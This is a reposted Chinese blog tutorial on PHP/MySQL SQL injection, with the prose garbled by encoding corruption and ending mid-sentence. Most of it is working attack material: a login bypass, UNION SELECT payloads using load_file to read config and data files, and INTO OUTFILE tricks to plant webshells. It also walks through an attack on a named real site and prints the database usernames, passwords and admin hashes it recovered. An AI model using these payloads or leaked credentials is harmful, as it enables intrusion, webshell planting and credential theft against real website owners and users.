²©¿ÍÊ×Ò³ ×¢²á ½¨ÒéÓë½»Á÷ ÅÅÐаñ ¼ÓÈëÓÑÇéÁ´½Ó         ±¦±¦Ïà²áµÄרÃſռä
ÍÆ¼ö ͶËß ËÑË÷£º °ïÖú

½£ÐÄͨÃ÷µÄ×ÊÁÏ¿â

ÎÄÕ¾ùÎª×ªÔØ£¬±¾È˲»¸ºÒò²Î¿¼ËüËùµ¼ÖµÄÒ»Çкó¹û£¬Çë½÷É÷²Î¿¼£¡ÈçÄúµÄÎÄÕ²»Ô¸±»×ªÔØ£¬Çëµã»÷´Ë´¦ÁªÏµ±¾ÈË£¡
  jxtm.cublog.cn

¹ØÓÚ×÷Õß
ÐÕÃû£º½£ÐÄͨÃ÷
Ö°Òµ£º¸ß¼¶¹¤³Ìʦ£¨×¨ÐÞÁé»ê^_^£©
ÄêÁ䣺20³öÍ·30²»µ½
λÖãºÍøÂçÉÏÒ»½Úµã
¸öÐÔ½éÉÜ£ºÅ¬Á¦Ñ§Ï°Ã¿Ò»Ì죡
ÇãÐÄ´òÔ죺http://www.bsdlover.cn
http://bbs.bsdlover.cn
BSD°®ºÃÕßµÄÀÖÔ°£¡
|| << >> ||
ÎҵķÖÀà


php×¢ÈëÏé½â£¨ËÄ£©

4.    md5µÄ¶ñÃÎ
ɽ¶«´óѧµÄÍõ²©Ê¿×î½ü¿ÉÊǸãmd5¸ãµÄºì͸ÁË£¬ÎÒÃÇÒ²À´¸ãÒ»¸ã°É£¬ÎÒÃDZÈËû¸üˬ£¬²»ÓüÆË㣬¹þ¹þ¡£
md5ÎÒÃÇÊÇÓÐ°ì·¨ÈÆ¹ýµÄ£¬µ«ÊDz¢²»ÊÇÄÄÀï¶¼¿ÉÒÔ£¬phpÖеÄmd5º¯Êý¾Í²»ÄÜÈÆ¹ý£¬ÒòΪÄãÊäÈëµÄËùÓж«Î÷¶¼ÔÚÀïÃæ£¬¸ù±¾Åܲ»³ö¡£¿ÉÒÔÈÆ¹ýµÄÊÇsqlÓï¾äÖеÄmd5¡£µ±È»±ðµÄsqlÖеĺ¯ÊýÒ²ÊÇ¿ÉÒÔÈÆ¹ýµÄ£¬µÀÀíÏàͬŶ¡£
¿´Àý×ÓÏÈ£º
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
ÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷Ìá½»
http:/login.php?username=char(97,98)) or 1=1 %23
´øÈësqlÓï¾ä³ÉΪselect * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."
¼ÇµÃmd5ÀïÃæ·ÅµÄÊÇ×Ö·û£¬ÒòΪºóÃæÓÐor 1=2£¬ËùÒÔÎÒÃÇËæ±ã·ÅÁ˸öchar(97,98).    Ok£¬µÇ½³É¹¦ÁËŶ£¡¿´¿´£¬md5ÔÚÎÒÃÇÃæÇ°Ò²Ã»ÓÐʲôÓô¦¡£
5.    ºËÐļ¼Êõ£¬ÀûÓÃphp+mysql×¢Èë©¶´Ö±½ÓдÈëwebshell¡£¡£
Ö±½ÓÀûÓÃ×¢ÈëµÃµ½webshell£¬ÕâÓ¦¸ÃÊÇ´ó¼Ò¶¼ºÜÏëµÄ°É£¬ÏÂÃæ¾Í½Ì¸øÄã¡£
ÕâÀï¼ÙÉèÄãÒѾ­ÖªµÀÁËÍøÕ¾ËùÔÚµÄÎïÀí·¾¶£¬ÎÒÕâÀï¼ÙÉèÍøÕ¾Â·¾¶Îªc:/apache/htdocs/site¡£ÍøÕ¾µÄmysqlÁ¬½ÓÐÅÏ¢·ÅÔÚ/lib/sql.inc.phpÀï
1£©ÊÊÓÃÓÚmagic_quotes_gpc£½Off
¼ÙÉèÎÒÃÇ¿ÉÒÔÉÏ´«Í¼Æ¬£¬»òÕßtxt£¬zip£¬µÈÆäËü¶«Î÷£¬ÎÒÃǰÑÎÒÃǵÄľÂí¸Ä³É
jpgºó׺µÄ£¬ÉÏ´«ºó·¾¶Îª/upload/2004091201.jpg
2004091201.jpgÖеÄÄÚÈÝΪ
ºÃ£¬ÎÒÃÇ¿ªÊ¼http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( C:/apache/htdocs/site/upload/2004091201.jpg ),4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php
ÒòΪÊÊÓÃÁËoutfile£¬ËùÒÔÍøÒ³ÏÔʾ²»Õý³££¬µ«ÊÇÎÒÃǵÄÈÎÎñÊÇÍê³ÉÁË¡£

ÎÒÃǸϿìÈ¥¿´¿´http://localhost/site/shell.php?cmd=dir

ˬ·ñ£¿WebshellÎÒÃÇÒѾ­´´½¨³É¹¦ÁË¡£¿´µ½×îÇ°ÃæµÄ12ÁËû£¿ÄǾÍÊÇÎÒÃÇselect 1£¬2ËùÊä³öµÄ£¡
2£©ÏÂÃæÔÙ½²Ò»¸öÊÊÓÃÓÚmagic_quotes_gpc£½OnµÄʱºò±£´æwebshellµÄ·½·¨Å¶£¬ÏÔÈ»¿Ï¶¨Ò²ÄÜÓÃÔÚÓÚmagic_quotes_gpc£½OffµÄʱºòÀ²¡£
ÎÒÃÇÖ±½Ó¶ÁËûµÄÅäÖÃÎļþ£¬Óü¼ÇÉ2½éÉܵķ½·¨
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
µÃµ½sql.inc.phpÄÚÈÝΪ

ºÃÁËÎÒÃÇÖªµÀÁËmysqlµÄrootÃÜÂëÁË£¬ÎÒÃÇÕÒµ½phpmyadminµÄºǫ́
http://localhost/phpmyadmin/
ÓÃrootÃÜÂëΪ¿ÕµÇ½¡£

È»ºóÎÒÃÇн¨Á¢Ò»¸ö±í½á¹¹ÄÚÈÝÈçÏ£º

#
# Êý¾Ý±íµÄ½á¹¹ `te`
#
CREATE TABLE te (
  cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# µ¼³öÏÂÃæµÄÊý¾Ý¿âÄÚÈÝ `te`
#
INSERT INTO te VALUES ( );
Ok£¬ÊÇÎÒÃÇÓÃselect * from table into outfile µÄʱºòÁË
Ö±½ÓÔÚphpmyadminµÄsqlÊäÈë
SELECT * FROM `te` into outfile C:/apache/htdocs/site/cmd1.php ;

Ok£¬³É¹¦Ö´ÐУ¬ÎÒÃÇÈ¥http://localhost/site/cmd1.php?cmd=dir¿´¿´Ð§¹ûÈ¥

ºÃˬµÄÒ»¸öwebshellÊǰɣ¡¹þ¹þ£¬ÎÒÒ²ºÜϲ»¶¡£
²»¹ý²»ÖªµÀ´ó¼ÒÓÐûÓз¢ÏÖÎÒÃÇÊÇÔÚmagic_quotes_gpc£½OnµÄÇé¿öÏÂÍê³ÉÕâÏ×÷µÄ£¬¾¹È»ÔÚphpmyadminÀï¿ÉÒÔ²»Óÿ¼ÂÇÒýºÅµÄÏÞÖÆ£¬¹þ¹þ£¬ËµÃ÷ʲô£¿ËµÃ÷phpmyadmin̫ΰ´óÁË£¬ÕâÒ²¾ÍÊÇÎÒÃÇÔÚ̸magic_quotes_gpc£½OnÈÆ¹ýʱËùÂôµÄÄǸö¹Ø×ÓÀ²£¡
6.·¢ÏÖûÓÐÎÒÃÇ»¹¿ÉÒÔÀûÓÃupdateºÍinsertÀ´²åÈëÎÒÃǵÄÊý¾Ý£¬È»ºóÀ´µÃµ½ÎÒÃǵÄwebshellŶ£¬»¹ÓÃÉÏÃæµÄÄǸöÀý×Ó£¬
//reg.php
......
$query = "INSERT INTO members
VALUES( $id , $login , $pass , $email , 2 )" ;
......
?>
ÎÒÃÇÔÚemailµÄµØ·½ÊäÈë
¼ÙÉèÎÒÃÇ×¢²áºóµÄidΪ10
ÄÇôÎÒÃÇ¿ÉÒÔÔÙÕÒµ½Ò»¸ö¿ÉÒÔ×¢ÈëµÄµØ·½
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile C:/apache/htdocs/site/test.php
ºÃÁË£¬ÎÒÃÇÓÖÓÐÁËÎÒÃǵÄwenshellÁËŶ¡£
7.mysqlµÄ¿ç¿â²éѯ
´ó¼ÒÊDz»ÊÇÒ»Ö±Ìý˵mysql²»ÄÜ¿ç¿â²éѯ°¡£¬¹þ¹þ£¬½ñÌìÎÒ½«Òª½Ì´ó¼ÒÒ»¸öºÃ·½·¨£¬Í¨¹ýÕâ¸ö·½·¨À´ÊµÏÖ±äÏàµÄ¿ç¿â²éѯ£¬·½·¨¾ÍÊÇͨ¹ýload_fileÀ´Ö±½Ó¶Á³ömysqlÖÐdat

aÎļþ¼ÐϵÄÎļþÄÚÈÝ£¬´Ó¶øÊµÏÖ±ä̬¿ç¿â²éѯ¡£
¾Ù¸öÀý×ÓÀ²
ÔÚÕâ֮ǰÎÒÃÇÏȽ²Ò»ÏÂmysqlµÄdataÎļþ¼ÐϵĽṹ
DataÎļþ¼ÐÏÂÓа´Êý¾Ý¿âÃûÉú³ÉµÄÎļþ¼Ð£¬Îļþ¼Ðϰ´ÕÕ±íÃûÉú³ÉÈý¸öºó׺Ϊfrm,myd,myiµÄÈý¸öÎļþ£¬ÀýÈç
MysqlÖÐÓÐalphaÊý¾Ý¿â£¬ÔÚalpha¿âÖÐÓÐalphaauthorºÍalphadbÁ½¸ö±í£¬
AlphaÎļþ¼ÐÄÚÈÝÈçÏÂͼ33

ÆäÖÐalphadb.frm·Å×Ålphadb±íÖеÄÊý¾Ý£¬alphadb.frm·Å×űíµÄ½á¹¹£¬alphadb.myiÖзŵÄÄÚÈÝËæmysqlµÄ°æ±¾²»Í¨»áÓÐËù²»Í¬£¬¾ßÌå¿ÉÒÔ×Ô¼ºÓüÇʱ¾´ò¿ªÀ´Åжϡ£
ʵÑ鿪ʼ
¼ÙÉèÎÒÃÇÖªµÀÓÐÁíÍâµÄÒ»¸öÊý¾Ý¿âyminfo210´æÔÚ£¬ÇÒ´æÔÚ±íuser£¬userÖзÅÕâadminµÄÐÅÏ¢¡£
ÎÒÃÇ
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( yminfo210/user.myd ),4,5,6,7,8,9,10,11
˵Ã÷һϣ¬load_fileĬÈÏËùÔÚµÄĿ¼ÊÇmysqlϵÄdataĿ¼£¬ËùÒÔÎÒÃÇÓÃ
load_file( yminfo210/user.myd )£¬µ±È»load_file( .info210/user.myd )Ò²ÊÇÒ»ÑùµÄ£¬×¢ÒâµÄÊÇinto outfileµÄĬÈÏ·¾¶ÊÇÔÚËùÔÚµÄÊý¾Ý¿âÎļþ¼ÐÏ¡£

ÎÒÃÇ¿´¶Á³öÀ´µÄÄÚÈÝ
Å|ÿÿ?   admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer  http://www.yoursite.com  (?ì[?ûûKAì[?ì[?  127.0.0.1  d|?ÿ?  aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd   ?EüKAMüKA 127.0.0.1 222  222222223423
ËäÈ»ÂÒÂëÒ»¶Ñ£¬µ«ÊÇÎÒÃÇ»¹ÊÇ¿ÉÒÔ¿´³öÓû§ÃûÊÇadmin£¬ÃÜÂëÊÇ698d51a19d8a121ce581499d7b701668£¬ºóÃæÆäËüµÄÊÇÁíÍâµÄÐÅÏ¢¡£
ͨ¹ýÕâÖÖ·½·¨ÎÒÃǾÍʵÏÖÁËÇúÏß¿ç¿â£¬ÏÂÃæµÄÀý×ÓÖÐÒ²»áÌᵽŶ£¡

˵ÁËÕâô¶àÏÂÃæÎÒÃÇÀ´¾ßÌåµÄʹÓÃÒ»´Î£¬Õâ´Î²âÊԵĶÔÏóÊǹúÄÚÒ»ÖøÃû°²È«ÀàÕ¾µã¨D¨DºÚ°×ÍøÂç
ÌýÈ˼Ò˵ºÚ°×ÓЩ¶´£¿ÎÒÃÇÒ»ÆðÈ¥¿´¿´°É¡£
http://www.heibai.net/down/show.php?id=5403%20and%201=1
Õý³£ÏÔʾ¡£

http://www.heibai.net/down/show.php?id=5403%20and%201=2
ÏÔʾ²»Õý³£¡£

ºÃ£¬ÎÒÃǼÌÐø
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
ÏÔʾ½á¹ûÈçÏÂ

×¢Ò⿴ͼÖÐûÓÐÏÔʾ³ÌÐòÃû£¬¶øÇÒ»¹¸½´øÁË
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

ÔÎÁË£¬ÍøÕ¾Â·¾¶³öÀ´ÁË£¬ÄǿɾÍËÀ¶¨ÁËŶ£¡
ÎÒÃǼÌÐø£¬Ö±µ½ÎÒÃDzµ½
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
µÄʱºòÕý³£ÏÔʾÁË¡£

ºÃÎÒÃÇת»»Óï¾ä³ÉΪ
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

¿´¿´¼ò½é´¦ÏÔʾΪ12£¬ÎÒÃÇ¿ÉÒԲ²â´Ë´¦Ó¦¸ÃΪ×Ö·ûÐÍ£¡
Ok£¬ÎÒÃÇÏÂÃæ¿´¿´ÎļþÄÚÈÝÏÈ
D:/web/heibai/down/show.phpת»¯³ÉasciiºóΪ
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,
104,111,119,46,112,104,112)
ÎÒÃÇ
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,
111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:ÊÇÖ¸²ì¿´Ô´´úÂ룬ÖÁÓÚΪʲôÓã¬ÎÒÃǺóÃæ½«½²µ½
ÏÔʾ³öËüµÄÔ´´úÂë

ÒòΪÔÚshow.phpÖÐÓÐÒ»¾ä

Èç¹ûÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷ÀïÌá½»»áÌø×ªµ½list.php
ÎÒÃÇ·¢ÏÖÕâ¾ärequire ("./include/config.inc.php");
ºÃ¶«Î÷£¬Ó¦¸Ã·ÅÕâÅäÖÃÎļþ£¬ok¼ÌÐø
d:/web/heibai/down/include/config.inc.php
ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105
,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÎÒÃÇÊäÈëhttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19

ÀïÃæÄÚÈÝÖ÷ÒªÓÐ
¡­¡­¡­¡­¡­¡­¡­..
ymDown (ҹèÏÂÔØÏµÍ³) ÊÇÒ»¸öÓ¦ÓÃÓÚÍøÕ¾ÌṩÏÂÔØ·þÎñµÄµÄ³ÌÐò
// ------------------------- -------- ------------------------- //
//                           ³£¹æÉèÖà                          //
// ------------------------- -------- ------------------------- //


// Êý¾Ý¿âÐÅÏ¢
$dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû
$dbuser = "download";// Êý¾Ý¿âÓû§Ãû
$dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë
$dbname = "download"; // Êý¾Ý¿âÃû

// Cookie Ãû³Æ
$cookie_name = "heibai";
// °æ±¾ºÅ
$version = "1.0.1";

// Êý¾Ý±íÃû
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
ÔÎÔ­À´ÓõÄÊÇҹèµÄÏÂÔØÏµÍ³£¬¶øÇÒÎÒÃÇÖªµÀÁË
$dbuser = "download";// Êý¾Ý¿âÓû§Ãû
$dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë
˵²»¶¨´ô»áÓÐÓÃŶ¡£
ÓõıíÃûÊÇĬÈϵıíÃû£¬ÎÒÃÇÖªµÀҹèµÄ¹ÜÀíÔ±ÃÜÂë·ÅÔÚymdown_userÖÐ
ÎÒÃǼÌÐøhttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user

¸ù¾ÝÌáʾÎÒÃÇÖªµÀÎļþ´óС´¦µÄÊÇusername£¬Ó¦ÓÃÆ½Ì¨´¦µÄÊÇpassword
¼´username=dload£¬password£½6558428£¬Ò¹Ã¨µÄºǫ́ĬÈÏÔÚadminĿ¼Ï£¬ÎÒÊÔÑéÁ˺ܾö¼Ã»ÓÐÕÒµ½£¬ÔÎÖ®¡£
ÏëÖ±½ÓÁ¬½Ómysql£¬·¢ÏÖtelnet¶Ë¿Ú²¢Ã»Óпª·Å¡£ÎÒÃÇÈ¥¿´¿´±ðµÄ°É£¡
http://www.heibai.net/vip/article/login.php
¿´ÆðÀ´ÏñÊÇ»áÔ±µÄµÇ½Ŷ£¬ÎÒÃÇ¿´¿´ÏÈ
d:/web/heibai/vip/article/login.php
ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
ÎÒÃÇÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19

ÆäÖÐ
require ("./include/global.php");
require ("./include/config.inc.php");
require ("./mainfunction.php");
require ("./function.php");
µ±È»ÁË£¬ÎÒÃÇÈ¥¿´config.inc.php°É
d:/web/heibai/vip/article/include/config.inc.php
ת³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19

ÏÔʾÁ˺ܶàºÃ¶«Î÷Ŷ

$dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû
$dbuser = "root"; // Êý¾Ý¿âÓû§Ãû
$dbpass = "234ytr8ut"; // Êý¾Ý¿âÃÜÂë
$dbname = "article"; // Êý¾Ý¿âÃû
$ymcms_user_table = "user";
$ymcms_usergroup_table = "usergroup";
$ymcms_userrace_table = "userrace";
±í»¹ÊÇĬÈÏµÄ±í£¬¶øÇÒ³öÀ´ÁËrootµÄÃÜÂë
ÒªÊÇÄÜÁ¬ÉÏËüµÄmysql¸Ã¶àºÃ°¡£¬ÄÇÑùÎÒÃǾͿÉÒÔinto outfileÁË
Í´¿àµÄÕÒÁËÕÒphpmyadmin£¬Ã»ÓÐÕÒ¼û£¬»òÐí¸ù±¾¾ÍûÓÐÓá£
¶Ác:/winnt/php.ini·¢ÏÖ
; Magic quotes
;
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = On
55555555£¬Í´¿àÖУ¬ÎÒÃÇ¿´¿´Äܲ»Äܸ㼸¸ö»áÔ±Õ˺Å
²Â²â»áÔ±Õ˺ŷÅÔÚuser±íÖУ¬ÎÒÃÇÖ±½Ó¶ÁdataÏÂarticleÎļþ¼ÐÀïµÄuser.mydÎÄ

·¢±íÓÚ£º 2008-05-17£¬ÐÞ¸ÄÓÚ£º 2008-05-17 11:12£¬ÒÑä¯ÀÀ72´Î£¬ÓÐÆÀÂÛ0Ìõ ÍÆ¼ö ͶËß


ÍøÓÑÆÀÂÛ
¡¡·¢±íÆÀÂÛ